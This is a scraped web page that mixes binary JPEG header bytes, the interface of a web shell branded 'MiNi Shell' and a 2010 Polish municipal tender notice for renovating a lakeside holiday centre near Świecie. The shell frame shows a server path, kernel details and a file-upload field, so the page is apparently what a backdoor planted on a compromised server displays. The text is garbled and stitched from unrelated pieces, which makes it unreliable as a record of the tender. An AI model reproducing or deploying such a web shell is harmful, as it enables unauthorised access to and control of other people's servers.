JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100428/101191-N-2010.html

<p class="kh_header"><b>Świecie: Modernizacja Ośrodka Wypoczynkowego nad jeziorem Deczno w miejscowości Sulnówko</b><br>
<b>Numer ogłoszenia: 101191 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świecie , ul. Wojska Polskiego 124, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 052 3332310, faks 052 3311306, 3332360.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um-swiecie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Ośrodka Wypoczynkowego nad jeziorem Deczno w miejscowości Sulnówko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
  Modernizacja Ośrodka Wypoczynkowego nad jeziorem Deczno w miejscowości Sulnówko
   w zakresie obejmującym wykonanie następujących robót :
						
a)	remont hangaru
   - rozebranie pokrycia   z płyt azbestowo cementowych w ilości 245,52 m2 obejmuje: rozbiórkę, odwóz i      
     utylizację wszystkich płyt
   - rozebranie rynien blachy w ilości 63,70 mb
   - rozebranie rur spustowych w ilości 37,20 mb
   - rozebranie obróbek blacharskich w ilości 56,42 m2
   - czyszczenie przez szczotkowanie ręczne do trzeciego stopnia czystości konstrukcji stalowej w ilości       
      187,365 m2
   - malowanie farbą miniową gruntującą konstrukcji stalowych 187,365 m2
   - czyszczenie reczne do trzeciego stopnia konstrukcji słupów o średnicy 160mm w ilości 11,5 m2
   - malowaniu farbą miniową gruntującą konstrukcji słupów w ilości 11,5 m2
   - malowanie całej konstrukcji stalowej farbami nawierzchniowymi 198,865 m2
   - pokrycie dachów płytami stalowymi powlekanymi dachówko podobnymi 268,608 m2
   - ołacenie połaci dachowej łatami drewnianymi dla blachy 268,608 m2
   - wykonanie obróbek blacharskich pasów nadrynnowych, ogniomurów, w rozwinięciu do 25 cm 22,70 m2
   - jw. lecz obróbek w rozwinięciu ponad 25 cm tj gąsiory 10,92 m2
   - zamontowanie rynien z PCV o średnicy 150mm 63,70mb
   - wykonanie ścianki działowej gr 12 cm z gazobetonu 31,08 m2
   - wykonanie tynku kat III na pomurowanej ściance 62,16 m2
   - uzupełnienie tynków odpadających wewnętrznych  o pow. do 0,5 m2 25 szt
   - wykucie otworu okiennego w ścianie szczytowej 0,18 m3
   - osadzenie okna z PCV powierzchnia 0,90 m2
   - dwukrotne malowanie tynków wewnętrznych z poszpachlowaniem nierówności farbami emulsyjnymi
      174,93 m2
   - wymiana płytek ceramicznych ściennych 30szt
   - okładziny sufitów z płyt GK wodoodpornych na suficie na ruszcie metalowym 10,64 m2
   - wykucie z muru ościeżnic metalowych drzwiowych 2 szt
   - wstawienie nowych ościeżnic drzwiowych metalowych 90x200 2szt
   - powieszenie skrzydeł drzwiowych 90x200 2szt
   - wmontowanie drzwi klepkowych z ościeżnicą we wrotach metalowych 1 szt
   - rozszklenie popękanych szyb ze szkła zbrojonego przy dachu 12,0 m2
   - oszklenie ram jw. szkłem zbrojonym 12,0 m2
   - montaż rur wywiewnych z łazienek do 100 mm 2 szt
   - docieplenie ścian zewnętrznych systemem Atlas Stopter 40,92 m2
   - malowanie ocieplonej elewacji farbami emulsyjnymi zewnętrznymi 40,92 m2
   - osadzenie kratek nawiewnych, osłona przed ptakami 2,16 m2

                                                                                           							      
b)	rozbiórka elementów pomostu

   - demontaż elementów pomostów metalowo drewnianych przez cięcie, rozkręcanie, wyciąganie dźwigiem i                                 
     załadunek na środki transportowe 23,145 tony
   - odwóz zdemontowanych elementów na składowisko złomu 23,145 ton do 1 km
   - dodatek za każdy dalszy kilometr 23,145 ton


      c)   budowa pomostu Marina

   - załadunek nowych elementów pomostu na środki transportowe 12,34 t
   - wyładunek elementów jw. w miejscu wbudowania 12,34 t
   - transport elementów jw. do 1 km 12,34 t
   - transport elementów jw. 12,34 t
   - osadzanie pali kafarem o średnicy 356 mm szt 17
   - montaż stalowego pokładu- konstrukcji 3,808 t
   - wypełnienie konstrukcji pokładu balami drewnianymi 143,00 m2
   - malowanie farbą podkładową powierzchni konstrukcji pomostu 57,86 m2
   - malowanie farbami epoksydowymi nawierzchniowymi powierzchni jw. 57,86 m2
   - wykonanie elementów betonowych pomostu 4,0 m3
   - warsztatowe przygotowanie konstrukcji pomostu 3.808,00 kg
   - ocynkowanie elementów konstrukcji pomostu 3.808,00 kg
   - montaż odbojnic na zmontowanym pomoście 35,00mb


      d)   utwardzenie szlaku pieszo-rowerowego kostką betonową gr 8 cm

   - ustawienie obrzeży betonowych 440 mb
   - nawierzchnia z kostki betonowej szarej gr 8 cm na podsypce cementowo piaskowej-
     330,00m2
   - nawierzchnia z kostki kolorowej  gr 8cm na podsypce cementowo piaskowej 550,00m2
   - ustawienie rur 50 mm dla znaków 4 szt
   - przymocowanie do słupów znaków informacyjnych 4 szt
   


                                                                                   


     e)  dostawa sprzętu pływającego

Pozycje obejmują zakup i dostawę sprzętu na miejsce tj. do  Ośrodka nad jeziorem Deczno

    - jacht szkoleniowy klasy OPTYMIST 4 szt
   - wózek slipowy do jachtu OPTYMIST 1 szt
   - wózek slipowy do jachtu KADET  1szt
   - stelaż do jachtu OPTYMIST 1szt
   - kamizelka asekuracyjna 15 szt
   - łódka Bączek dł 210 cm 1szt
   - koło ratunkowe podkowa 1 szt
   - koło ratunkowe 55x30 cm 2 szt
   - zestaw ratunkowy dla osób za burtą z rzutką i torbą  1szt
   - maska do reanimacji w breloku 6 szt
   - bosak teleskopowy aluminiowy dł 200cm 2 szt
                                                         
                                 
      f)  Dostawa i montaż elementów placu zabaw

    - huśtawka Konik 1 szt
    - huśtawka Kogut 1 szt
    - huśtawka Ważka 1szt
    - zjeżdżalnia z drabinką 1szt
    - siedzisko huśtawkowe  2 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.62.90-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie ( zakończone) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
-	1 roboty budowlanej polegającej na wybudowaniu pomostu o konstrukcji stalowej wraz z wykonaniem poszycia pomostu z bali drewnianych o łącznej długości min.55mb
wraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
          _  1 roboty rozbiórkowej polegającej na wykonaniu demontażu poszycia dachowego z płyt azbestowo-
              cementowych wraz z ich utylizacją przez wyspecjalizowaną firmę.
--  1 roboty budowlanej polegającej na budowie,przebudowie ,remoncie obiektu  kubaturowego
--  1 roboty budowlanej polegającej na wykonaniu placu zabaw dla dzieci</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie narzędziami i urządzeniami technicznymi dostępnymi Wykonawcy w celu realizacji zamówienia, w tym co najmniej:
-	  kafar parowy do 1 t lub wibromłot - 1 szt.,
-	  żuraw samojezdny do 5 t - 1 szt.
-	  koparka samojezdna  -  1 szt.
-	  zagęszczarka, ubijaki mechaniczne -  2 szt
          -  transport kołowy - 1 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia, co najmniej:
-	1 kierownik budowy - posiadający uprawnienia budowlane do kierowania robotami budowlanymi zgodnie z przepisami Prawa Budowlanego, w specjalności konstrukcyjno - budowlanej w zakresie ogólnobudowlanym bez ograniczeń ; / wykazane
-	 doświadczenie- kierowanie robotami ogólnobudowlanymi - min.3 lata jako kierownik budowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wkonawca wykaże posiadanie opłaconej polisy, a w przpadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działaności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany Formularz oferty ( lub zgodny z załączonym wzorem) - Załącznik nr 1,
 Wymagana forma dokumentu - oryginał 

2.	Kosztorys ofertowy sporządzony na podstawie przedmiaru robót  - Załącznik nr 2 
 Wymagana forma dokumentu - oryginał

3.	Pełnomocnictwo w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. (w przypadku składania oferty przez Wykonawców występujących  wspólnie należy załączyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i  zawarcia umowy w sprawie niniejszego zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dokona zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:

1)	zmiana terminu wykonania zamówienia w następujących przypadkach:
a)	o okres rozstrzygnięcia postępowania - odwołania,
b)	zmiany spowodowane warunkami atmosferycznymi: wystąpienie niekorzystnych warunków atmosferycznych udokumentowanych przez Wykonawcę, uniemożliwiających dochowanie wymogów technicznych i technologicznych,
c)	wystąpienie siły wyższej np. pożaru, powodzi i inne klęski żywiołowe,
d)	wstrzymanie robót przez inspektora nadzoru inwestorskiego ( Zamawiającego),
e)	wystąpienia robót dodatkowych, określonych w art. 67 ust.1 pkt.5 ustawy Pzp, których wykonanie będzie miało wpływ na harmonogram rzeczowo finansowy i w przypadkach wyszczególnionych w pkt 2, 
f)	wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę, np. dokonanie odkrywki archeologicznej, odkrycie niewypału itp.
g)	zmiany będące następstwem osób trzecich,
h)	zmiany będące następstwem działania organów administracji w szczególności wynikających z terminów wydania przez organy administracji decyzji, zezwoleń, uzgodnień, opinii, itp.,
i)	zmiany będące następstwem zdarzeń losowych, których niezwłocznie poinformowano Zamawiającego,
                                                                            
         
                                    

j)	zmiany przepisów prawa,
k)	wystąpienie nie dających się przewidzieć zjawisk geologicznych i hydrologicznych pojawiających się w trakcie budowy nie ustalonych w oparciu o dokonane badania geologiczne, np. osuwisk, kurzawek,
l)	wystąpi konieczność wykonania dokumentacji zamiennej,
m)	wystąpi opóźnienie w przekazaniu placu budowy lub jego części a opóźnienie to będzie miało wpływ na termin zakończenia robót
2)	zmiany zakresu i sposobu wykonania przedmiotu zamówienia:
a)	zaistnienie okoliczności powodujących, że wykonanie umowy zgodnie z opracowaną dokumentacją projektową nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy, wykonania dokumentacji zamiennej,
b)	rezygnacja z części robót lub zmiana ilości np.: wymienionych w pozycjach kosztorysów ofertowych,
3)	zmiany osobowe w zakresie pełnienia funkcji inspektorów nadzoru i kierowników budowy lub robót, legitymujących się, co najmniej równoważnymi uprawnieniami opisanymi w warunkach przetargowych lub wynikających z obowiązujących przepisów prawa,
4)	inne zmiany:
a)	ustawowa zmiana podatku od towarów i usług - VAT,
b)	zmiana nazwy zadania,
c)	zmiana rachunku Wykonawcy,
d)	zmiany podwykonawców lub wprowadzenie podwykonawców w przypadku braku ich wypełnienia w ofercie spełniających warunki lub wymagania opisane w specyfikacji istotnych warunków zamówienia ( jeśli były opisane i Wykonawca składając ofertę polegał na zasobach innych podmiotów),
5)	W przypadku zmian wynikających z powyższych zapisów wymagana będzie zgoda Zamawiającego i zawarcie stosownego aneksu do umowy.
6)	Nie stanowią zmian umowy w rozumieniu art.144 ustawy Pzp udzielanie zamówień dodatkowych określonych w przepisach ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip3.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie, Wydział Inwestycyjny, pok. nr 01.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 09:00, miejsce: Urząd Miejski w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie, pok. nr 21 (w sekretariacie).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert nastąpi w dniu 14 maja 2010 r. o godz. 10:00 w Wydziale Inwestycyjnym, pok. nr 04 Urzędu Miejskiego w Świeciu, ul. Wojska Polskiego 124.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com